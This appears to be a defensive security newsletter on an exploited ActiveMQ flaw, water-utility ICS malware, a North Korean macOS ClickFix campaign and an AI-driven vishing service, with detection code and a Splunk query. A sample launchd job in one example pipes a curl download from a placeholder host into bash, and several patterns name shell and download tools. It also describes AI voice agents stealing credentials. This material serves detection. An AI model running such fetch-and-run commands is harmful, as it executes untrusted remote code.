A 13-year-old remote code execution flaw in Apache ActiveMQ is now being exploited in the wild, two weeks after the patch dropped. CISA added CVE-2026-34197 to the KEV catalog yesterday. Separately, purpose-built ICS malware is hitting water infrastructure, a North Korean APT is social-engineering macOS users through fake Zoom updates, and an AI-powered vishing platform is automating credential theft at a scale that previously required rooms full of human callers.

In the News

Apache ActiveMQ CVE-2026-34197: 13 Years Dormant, Now Exploited

CVE-2026-34197 is a remote code execution vulnerability in Apache ActiveMQ Classic with a CVSS score of 8.8. The flaw resided in the OpenWire protocol implementation and existed in the codebase for approximately 13 years before Apache patched it in early April 2026 with ActiveMQ versions 5.18.7 and 6.1.5.

On April 16, CISA added CVE-2026-34197 to the Known Exploited Vulnerabilities (KEV) catalog after confirming active exploitation. The KEV listing triggers BOD 22-01 remediation timelines for federal civilian executive branch agencies, but its real significance is the signal it sends: exploitation is not theoretical. Attackers are using this now.

The operational challenge is visibility. ActiveMQ is middleware — it sits between applications, often behind the DMZ, frequently missed by external vulnerability scanners. Organizations that do not maintain accurate asset inventories of their message broker infrastructure will not know they are exposed until an attacker demonstrates it for them.

What defenders should do: Patch to ActiveMQ 5.18.7+ or 6.1.5+ immediately. If patching requires a maintenance window, restrict network access to the OpenWire transport connector (default TCP 61616) to only authorized application servers. Audit asset inventories for ActiveMQ instances — check container orchestration platforms, integration middleware stacks, and legacy application architectures where message brokers tend to persist untracked. Monitor for unexpected outbound connections from ActiveMQ hosts. MITRE ATT&CK: T1190 — Exploit Public-Facing Application.

Source: BleepingComputer


ZionSiphon Malware Purpose-Built for Water Treatment ICS/OT

Researchers disclosed ZionSiphon, a malware family purpose-built for sabotage operations against industrial control systems in Israeli water treatment facilities. The malware targets the operational technology environments that manage water purification and distribution — the systems that control chemical dosing, pressure, and flow rates.

Purpose-built ICS malware remains rare. Most ransomware campaigns that hit critical infrastructure do so incidentally — encrypting IT systems and causing OT disruption as a side effect. ZionSiphon is different. It is designed from the ground up to interact with industrial control processes, placing it in the same category as Industroyer, TRISIS/TRITON, and FrostyGoop — malware built specifically to manipulate physical processes.

The primary defensive gap in most water utilities is IT/OT segmentation. When operational technology networks share flat network space with corporate IT, any compromise of an email account, VPN credential, or web application becomes a potential path to the controllers managing water treatment. The second gap is visibility: many OT environments lack the network monitoring needed to detect anomalous commands on industrial protocols like Modbus, DNP3, or EtherNet/IP.

What defenders should do: Verify IT/OT network segmentation with actual traffic analysis, not architecture diagrams. Deploy OT-aware network monitoring that can baseline and alert on anomalous industrial protocol traffic. Review remote access paths into OT environments and ensure they require phishing-resistant MFA with session recording. MITRE ATT&CK for ICS: T0831 — Manipulation of Control, T0886 — Remote Services.

Source: SecurityWeek
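
The baselining approach recommended above can be sketched for Modbus/TCP as follows. This is an added example, not code from the researchers or any vendor; the class name, addresses and sample frames are assumptions constructed for illustration.

```python
import struct

# Modbus function codes that change process state (writes to coils/registers).
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}

def build_frame(txn, unit, function, data):
    """Build a Modbus/TCP request: 7-byte MBAP header, function code, data."""
    return struct.pack(">HHHBB", txn, 0, len(data) + 2, unit, function) + data

def parse_frame(frame):
    """Return (unit_id, function_code), or None if the MBAP header is inconsistent."""
    if len(frame) < 8:
        return None
    _txn, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        return None
    return unit, frame[7]

class ModbusBaseline:
    """Learn (source, unit, function) tuples, then flag anything not seen before."""
    def __init__(self):
        self.seen = set()

    def learn(self, src, frame):
        parsed = parse_frame(frame)
        if parsed:
            self.seen.add((src, *parsed))

    def check(self, src, frame):
        parsed = parse_frame(frame)
        if parsed is None:
            return f"MEDIUM: malformed Modbus/TCP frame from {src}"
        if (src, *parsed) in self.seen:
            return None
        unit, function = parsed
        if function in WRITE_FUNCTIONS:
            return f"HIGH: new {WRITE_FUNCTIONS[function]} from {src} to unit {unit}"
        return f"MEDIUM: new function {function} from {src} to unit {unit}"

# Constructed traffic: addresses, unit id and register values are made up.
READ = build_frame(1, 1, 3, struct.pack(">HH", 0, 10))     # Read Holding Registers
WRITE = build_frame(2, 1, 6, struct.pack(">HH", 40, 900))  # Write Single Register

def demo():
    baseline = ModbusBaseline()
    baseline.learn("10.0.5.10", READ)  # HMI polling seen during the baseline window
    return [baseline.check("10.0.5.10", READ), baseline.check("10.0.1.77", WRITE)]

if __name__ == "__main__":
    print(demo())
```

The write from an address outside the learned set is the case that matters: it is what a path from the IT network into the controllers looks like on the wire.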


Sapphire Sleet (DPRK) Targets macOS via Fake Zoom Updates

Microsoft published a detailed technical analysis of a Sapphire Sleet campaign deploying ClickFix social engineering against macOS users. Sapphire Sleet is a North Korean threat actor tracked by Microsoft, with established patterns of targeting cryptocurrency, finance, and technology sector organizations for credential and cryptocurrency theft.

The attack chain starts with social engineering — typically a LinkedIn or email lure offering a meeting or interview. When the target clicks the meeting link, they are presented with a fake Zoom update prompt that instructs them to copy and paste a command into Terminal. Because the user executes the command themselves, macOS Gatekeeper and notarization protections are bypassed entirely. The executed payload establishes persistence in the user’s LaunchAgent directory and begins credential harvesting and cryptocurrency wallet exfiltration.

This is a user-execution attack, not an exploit. No vulnerability is required. The defense stack that matters here is endpoint detection on macOS (which many organizations run with weaker coverage than Windows), application control policies that restrict Terminal execution of unsigned code, and security awareness training that specifically addresses macOS social engineering lures.

What defenders should do: Ensure endpoint detection and response agents are deployed on macOS with equivalent policy depth to Windows. Review LaunchAgent and LaunchDaemon directories for unauthorized persistence (~/Library/LaunchAgents/ and /Library/LaunchDaemons/). Block or alert on curl | bash and osascript execution chains from user-writable directories. Train users on the specific ClickFix lure pattern — no legitimate application update asks a user to paste commands into Terminal. MITRE ATT&CK: T1204.002 — User Execution: Malicious File, T1547.011 — Boot or Logon Autostart Execution: Plist Modification.

Source: Microsoft Security Blog
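
The LaunchAgent and LaunchDaemon review recommended above can be scripted. This is an added example, not code from Microsoft's analysis; the path prefixes treated as user-writable are an assumption, and the sample job definitions are constructed.

```python
import plistlib
import re

# Chains the brief says to alert on: downloader piped to a shell, and osascript.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")
OSASCRIPT = re.compile(r"\bosascript\b")
# Assumption: these prefixes approximate user-writable locations on macOS.
USER_WRITABLE = re.compile(r"^(/Users/|/tmp/|/private/tmp/|/var/tmp/)")

def triage_plist(raw):
    """Parse one launchd job definition (bytes) and return reasons to review it."""
    job = plistlib.loads(raw)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    if not args:
        return ["no Program or ProgramArguments key"]
    joined = " ".join(args)
    reasons = []
    if PIPE_TO_SHELL.search(joined):
        reasons.append("downloader piped into a shell")
    if OSASCRIPT.search(joined):
        reasons.append("runs osascript")
    if USER_WRITABLE.match(args[0]):
        reasons.append("executable lives in a user-writable path")
    if reasons and job.get("RunAtLoad"):
        reasons.append("starts automatically (RunAtLoad)")
    return reasons

def scan(plists):
    """Map plist name -> reasons, for every plist that has at least one."""
    results = {name: triage_plist(raw) for name, raw in plists.items()}
    return {name: reasons for name, reasons in results.items() if reasons}

# Constructed samples (labels, paths and the URL are made up). On a real host,
# read the *.plist files in ~/Library/LaunchAgents/ and /Library/LaunchDaemons/.
SAMPLES = {
    "com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater", "RunAtLoad": True,
        "ProgramArguments": ["/bin/bash", "-c",
                             "curl -fsSL https://updates.example.invalid/u.sh | bash"]}),
    "com.example.helper.plist": plistlib.dumps({
        "Label": "com.example.helper", "RunAtLoad": True,
        "Program": "/Users/alice/Library/Application Support/.helper/agent"}),
    "com.example.backup.plist": plistlib.dumps({
        "Label": "com.example.backup", "RunAtLoad": True,
        "ProgramArguments": ["/usr/local/bin/backup-agent", "--daemon"]}),
}

if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(name, "->", "; ".join(reasons))
```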


ATHR Vishing Platform Uses AI Voice Agents for Automated Credential Theft

A new vishing-as-a-service (VaaS) platform called ATHR deploys AI-generated voice agents to conduct phone-based social engineering at scale. The platform automates the full vishing call flow — pretexting as help desk staff, walking targets through credential disclosure or MFA approval, and extracting one-time codes — without requiring a human operator on the line.

The operational impact is volume. Traditional vishing campaigns were constrained by the number of skilled social engineers available. ATHR removes that bottleneck. An attacker can run hundreds of concurrent vishing calls, each delivered by a convincing AI voice agent that adapts its script based on the target’s responses.

This development forces a re-examination of help desk identity verification procedures. Many organizations still verify callers using knowledge-based authentication (employee ID, manager name, last four of SSN) — all of which can be harvested from prior breaches or OSINT. When the caller is an AI agent that never sounds nervous, never goes off-script, and never gives up, those controls are insufficient.

What defenders should do: Implement phishing-resistant MFA (FIDO2) to eliminate the value of stolen credentials and one-time codes. Upgrade help desk identity proofing beyond knowledge-based authentication — consider callback verification to a registered phone number or in-band identity verification through an enrolled authenticator app. Brief employees that AI-generated voices on phone calls are now operationally deployed by threat actors and that a caller sounding legitimate is no longer a reliable indicator of authenticity.

Source: BleepingComputer


Today’s Deep Dive — Middleware as Attack Surface: Why Message Brokers Keep Getting Exploited

The ActiveMQ KEV listing is not an isolated event. Apache ActiveMQ was the target of CVE-2023-46604 in late 2023 — another critical RCE in the OpenWire protocol — which was exploited by ransomware operators within days of disclosure. CVE-2026-34197 follows the same pattern: a flaw in the same protocol, in the same codebase, dormant for over a decade.

Message brokers like ActiveMQ, RabbitMQ, Apache Kafka, and IBM MQ sit at the center of application integration architectures. They handle inter-service communication, event streaming, and asynchronous processing. They are, by design, reachable by many internal systems. When a message broker is compromised, the attacker inherits the network position and trust relationships of every application that connects to it — which in enterprise environments can be dozens or hundreds of services.

The reason these systems keep appearing in exploitation timelines is a combination of three factors:

1. Invisible asset inventory. Message brokers are often deployed by development teams, sometimes in containers, sometimes on legacy VMs provisioned years ago. They rarely appear in the same asset management database as web servers and domain controllers. Vulnerability management programs that scan only known assets miss them entirely.

2. Excessive network exposure. The default configuration for most message brokers listens on all interfaces. In flat network architectures, this means any compromised host on the same subnet can reach the broker. ActiveMQ’s OpenWire connector defaults to TCP 61616 and its web console defaults to TCP 8161 — both frequently left accessible far beyond what is operationally necessary.

3. Infrequent patching cycles. Middleware is treated as infrastructure — “if it is not broken, do not touch it.” Patching a message broker requires coordination with every application that depends on it, which creates organizational friction that delays updates for weeks or months. Attackers who monitor CVE disclosures for middleware products understand this delay and target it.

The defensive response is straightforward in concept and difficult in execution: maintain an accurate, continuously updated inventory of all message broker instances; restrict network access to broker ports using host-based firewalls or microsegmentation to only the specific application servers that require connectivity; and include middleware in automated patch orchestration with SLAs that reflect the reality of active exploitation timelines — days, not months.

For ActiveMQ specifically, defenders should audit for instances still running OpenWire on the default port without authentication. The web management console at TCP 8161 should be disabled or restricted to management jump hosts. MITRE ATT&CK technique T1190 — Exploit Public-Facing Application applies when the broker is reachable from untrusted networks; T1210 — Exploitation of Remote Services applies for lateral movement within internal networks.
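
The inventory audit described here and in the news item above can be run against whatever asset data is already collected. This is an added example, not Apache's or CISA's tooling; the record layout and hostnames are constructed, and treating any release line other than 5.x and 6.x as unpatched is an assumption.

```python
import re

# Fixed releases named in this brief for CVE-2026-34197, keyed by major version.
FIXED = {5: (5, 18, 7), 6: (6, 1, 5)}
# Default ports named in this brief: OpenWire and the web console.
BROKER_PORTS = {61616: "OpenWire", 8161: "web console"}
WILDCARD_BINDS = {"0.0.0.0", "::", "*"}

def parse_version(text):
    """Return (major, minor, patch) from a string such as '5.18.3', else None."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(p) for p in m.groups()) if m else None

def is_patched(version):
    """True only when the version is at or above the fixed release for its major line."""
    v = parse_version(version)
    if v is None or v[0] not in FIXED:
        return False  # unparseable or unlisted release lines count as unpatched
    return v >= FIXED[v[0]]

def audit(record):
    """Return the findings for one inventory record."""
    findings = []
    if not is_patched(record["version"]):
        findings.append(f"version {record['version']} is below the fixed release")
    for bind, port in record["listeners"]:
        if port in BROKER_PORTS and bind in WILDCARD_BINDS:
            findings.append(f"{BROKER_PORTS[port]} port {port} listens on all interfaces")
    return findings

def report(inventory):
    """Map host -> findings for every host with at least one finding."""
    results = {r["host"]: audit(r) for r in inventory}
    return {host: findings for host, findings in results.items() if findings}

# Constructed inventory records (hostnames, versions and listeners are made up).
INVENTORY = [
    {"host": "mq-legacy-01", "version": "5.16.2",
     "listeners": [("0.0.0.0", 61616), ("0.0.0.0", 8161)]},
    {"host": "mq-orders-02", "version": "6.1.5",
     "listeners": [("10.20.0.15", 61616), ("127.0.0.1", 8161)]},
    {"host": "mq-k8s-03", "version": "6.0.1",
     "listeners": [("10.20.4.7", 61616)]},
]

if __name__ == "__main__":
    for host, findings in report(INVENTORY).items():
        for finding in findings:
            print(f"{host}: {finding}")
```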

Detection Spotlight

The following Splunk SPL query identifies potential exploitation of ActiveMQ OpenWire protocol by detecting new or anomalous process execution spawned by the ActiveMQ Java process. This targets post-exploitation behavior where a successful RCE results in the ActiveMQ process spawning child processes it would not normally execute.

index=endpoint (sourcetype=sysmon OR sourcetype=linux:auditd)
  (ParentImage="*activemq*" OR ParentCommandLine="*activemq*" OR (ParentImage="*java*" AND parent_command_line="*activemq*"))
  NOT (Image IN ("*java*", "*jstack*", "*jmap*", "*jcmd*"))
| eval risk_score=case(
    match(Image, "(?i)(cmd\.exe|powershell|bash|sh|curl|wget|certutil|bitsadmin)"), 90,
    match(Image, "(?i)(python|perl|ruby|node)"), 75,
    true(), 50)
| where risk_score >= 75
| stats count max(risk_score) as risk_score earliest(_time) as first_seen latest(_time) as last_seen values(Image) as spawned_processes values(CommandLine) as commands by host ParentImage
| where count < 5
| sort - risk_score

This query monitors for the ActiveMQ Java process spawning shell interpreters (bash, sh, cmd.exe, powershell), download utilities (curl, wget, certutil), or scripting runtimes (python, perl) — none of which should be child processes of a message broker under normal operations. The count < 5 filter suppresses high-volume legitimate activity and focuses on novel executions. False positive rate is low in environments where ActiveMQ is not used for legitimate script execution; tune the NOT clause to exclude any site-specific maintenance scripts that legitimately run under the ActiveMQ process context.
